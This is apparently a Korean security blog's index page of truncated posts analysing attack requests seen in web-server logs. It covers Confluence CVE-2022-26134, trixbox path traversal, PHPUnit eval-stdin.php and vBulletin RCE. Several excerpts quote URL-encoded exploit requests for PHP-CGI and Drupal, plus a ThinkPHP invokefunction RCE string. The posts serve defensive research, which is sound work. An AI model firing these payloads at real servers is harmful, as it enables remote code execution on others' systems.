<OOO>

CVE 번호 : CVE-2022-26134 공격 유형 : 원격 코드 실행(RCE) 취약한 버전 : Confluence Server(1.3.0 이상) 및 Data Center의 모든 버전 예상 패치 날짜 : 태평양 시간 기준 6월 3일 오전 10시 패치 된 버전 : 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 및 7.18.1 대응 방안 : WAF(웹 방화벽)를 사용하여 URL에 ${ 가 존재한다면 차단하는 정책 설정 혹은 패치된 버전으로 업그레이드 현재까지 공격을 시도한 IP 목록 (차단 대상) : https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of..

CVE 코드 : CVE-2017-14537 취약한 범위 : trixbox ? ~ 2.8.0.4 공격 종류 : Path Traversal 웹 페이지 언어 : PHP 허니팟 같은(?) 서버를 열어서 웹 해킹은 요즘 어떤게 들어오나... 하면서 분석하고 있었는데 재밌는 로그가 있었다. 이거 보면서 curl 넣네 오 이건 뭘까 라는 생각이 들었다. 요즘 번아웃 친구가 찾아와서 아무것도 하기 싫었는데 로그 보니까 다시 삶의 활력을 되찾은것같다. (위의 사진은 RCE 취약점이지만, Path Traversal 취약점도 있어 이번 포스팅은 Path Traversal 만 설명 한다.) 이제 분석을 시작 해보겠다. 이 취약점 같은 경우 trixbox 플렛폼에서 터지는 취약점인데, trixbox가 뭐냐? trixbox는 최..

생각보다 다양한 공격이 들어오고 공격 로그를 살펴보면 RCE 취약점이 대부분 인것같다. 이번에도 새로운 공격 로그를 들고왔다!! /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E..

웹 서버 로그 에 이런게 찍혀있었다. /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 url encoding이 되어있어 한눈에 보기 어렵지만 뭔가 이상한 로그라고 생각이 바로 든다. 얘를 디코딩 하면 /user/register?element_parents=timezone/timez..

웹 서버 로그에 이런게 찍혀있다. /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php PHPUnit RCE 취약점이다. 영향을 받는 버전대는 4.8.28 이전의 버전 혹은 5.6.3 이전의 5.x 에서 발생한다. vendor 디렉토리는 패키지가 저장되는 폴더이며 composer를 통해 설치되는 패키지들을 저장한다. composer는 php의 의존성 관리 도구이다. POST 방식으로 날아가며 상단에는 /vendor/phpunit ~~~ 으로 넣고 body에 라는 php 코드를 같이 사용하는 것 같다. (test는 예시) 이 취약점은 eval-stdin.php의 페이지 요청이 되면서 제대로 된 인증이 존재하지 않아 발생하는 취약점이다. 참고 cve.mitre.org/..

웹 서버 로그에 이런게 찍혀있다. /?a=fetch&content=die(@md5(HelloThinkCMF)) 앞에 설명했던 ThinkPHP가 생각이 나게끔 만드는 로그다. vBulletin 템플릿에서 발생하는 취약점인데 영향받는 버전은 5.0.0 ~ 5.5.4 까지 받는다고 한다. 이것도 원격코드 실행 취약점(RCE)이며 워드프레스 인것같다. 출처 www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/ blog.alyac.co.kr/3180 jeongzzang.com/173

웹 서버를 열어놨더니 이상한 로그가 찍혀있어 리서치용으로 포스터를 작성하고자 한다. ThinkPHP 란? 중국에서 개발한 PHP 프레임 워크. 이 취약점이 발표될 당시에 중국에선 4만여개의 사이트들이 ThinkPHP를 사용했었는데 해킹 사건이 많이 발생했다. 한국에도 ThinkPHP를 사용하긴 한다.(극소수) 영향 받는 버전 : 5.0.20,5.1.30 cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20062 이 취약점을 사용하면 RCE, 즉 원격명령 실행이 가능하다. 해당 exploit 코드는 다음과 같다. /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md..